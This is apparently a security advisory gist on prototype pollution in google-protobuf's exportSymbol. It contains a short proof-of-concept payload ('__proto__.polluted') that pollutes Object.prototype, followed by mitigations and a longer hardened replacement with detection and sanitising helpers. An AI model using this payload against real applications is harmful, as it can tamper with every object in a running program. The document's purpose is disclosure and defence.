@tariqhawis
Last active July 29, 2024 18:34
Prototype Pollution in google-protobuf, All versions

Overview

Affected versions of this module are vulnerable to Prototype Pollution because exportSymbol does not check whether a segment of its dotted-path argument resolves to the object prototype. This allows an attacker to inject a malicious property through a built-in Object property such as __proto__; the injected property lands on Object.prototype and is therefore inherited by every object in the program.

PoC

```javascript
(async () => {
  const goog = await import('google-protobuf');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // The dotted path walks into Object.prototype and defines "polluted" there.
    goog.exportSymbol("__proto__.polluted", true);
  } catch (e) {}
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up so the rest of the process is not left with a polluted prototype.
  delete Object.prototype.polluted;
})();
```

How to prevent:

  • Freeze the root prototype using Object.freeze.
  • Require schema validation of JSON input.
  • Avoid using unsafe recursive merge functions.
  • Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
  • As a best practice, use Map instead of Object.
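The following is an added example, not code from the gist or from google-protobuf, showing what a hardened counterpart to a Closure-style exportSymbol looks like and how the mitigations listed above fit together. The function names (safeExportSymbol, parseJsonWithoutPrototypeKeys, prototypeIsClean, freezeRootPrototype) and the sample inputs are constructed for illustration; the only behaviour assumed from the page is that a dotted path such as "__proto__.polluted" must never be allowed to reach Object.prototype.

```javascript
'use strict';

// Path segments that would let a dotted name walk into the shared
// prototype chain instead of staying inside a plain namespace object.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Hardened counterpart (hypothetical, not the library's API) to
// exportSymbol(name, value, root). It still builds "a.b.c" namespaces, but
// rejects forbidden segments, never follows inherited properties, and creates
// intermediate containers with Object.create(null) so there is nothing to pollute.
function safeExportSymbol(name, value, root = Object.create(null)) {
  const parts = name.split('.');
  let cur = root;
  for (let i = 0; i < parts.length; i++) {
    const key = parts[i];
    if (key === '' || FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`refusing unsafe path segment "${key}" in "${name}"`);
    }
    if (i === parts.length - 1) {
      cur[key] = value; // own property on the namespace object, never on Object.prototype
      return root;
    }
    // Reuse only an existing *own* object; inherited values and primitives are shadowed.
    if (!hasOwn(cur, key) || typeof cur[key] !== 'object' || cur[key] === null) {
      cur[key] = Object.create(null);
    }
    cur = cur[key];
  }
  return root;
}

// JSON.parse creates an own property even for a key literally named "__proto__";
// a later naive recursive merge of that object into a target then pollutes
// Object.prototype. The reviver drops forbidden keys at every depth before any
// merge can see them (a minimal form of the "validate JSON input" mitigation).
function parseJsonWithoutPrototypeKeys(text) {
  return JSON.parse(text, (key, val) => (FORBIDDEN_KEYS.has(key) ? undefined : val));
}

// Startup self-check / detection: a fresh object must not inherit a property
// that nothing ever defined on it.
function prototypeIsClean(marker = 'polluted') {
  return !(marker in {});
}

// First mitigation from the list: freeze the root prototype once, after
// polyfills and libraries that legitimately extend it have loaded, so later
// writes to it fail (throwing in strict mode) instead of succeeding.
function freezeRootPrototype() {
  Object.freeze(Object.prototype);
  return Object.isFrozen(Object.prototype);
}

// Constructed inputs mirroring the PoC: the unsafe dotted path and a JSON body
// that carries a "__proto__" key.
function demo() {
  const ns = safeExportSymbol('proto.example.Msg', { fields: 1 });
  let rejected = false;
  try {
    safeExportSymbol('__proto__.polluted', true);
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  const parsed = parseJsonWithoutPrototypeKeys('{"__proto__":{"polluted":true},"id":7}');
  return {
    exported: ns.proto.example.Msg.fields, // 1
    rejected,                              // true
    parsedKeys: Object.keys(parsed),       // ["id"]
    clean: prototypeIsClean('polluted'),   // true
  };
}

console.log(demo());
```

Run it with node; freezeRootPrototype is deliberately not called in the demo so that the process stays usable for code that still needs to patch Object.prototype at load time, but calling it once at the end of application bootstrap turns any remaining pollution attempt into a thrown error rather than a silent inheritance change.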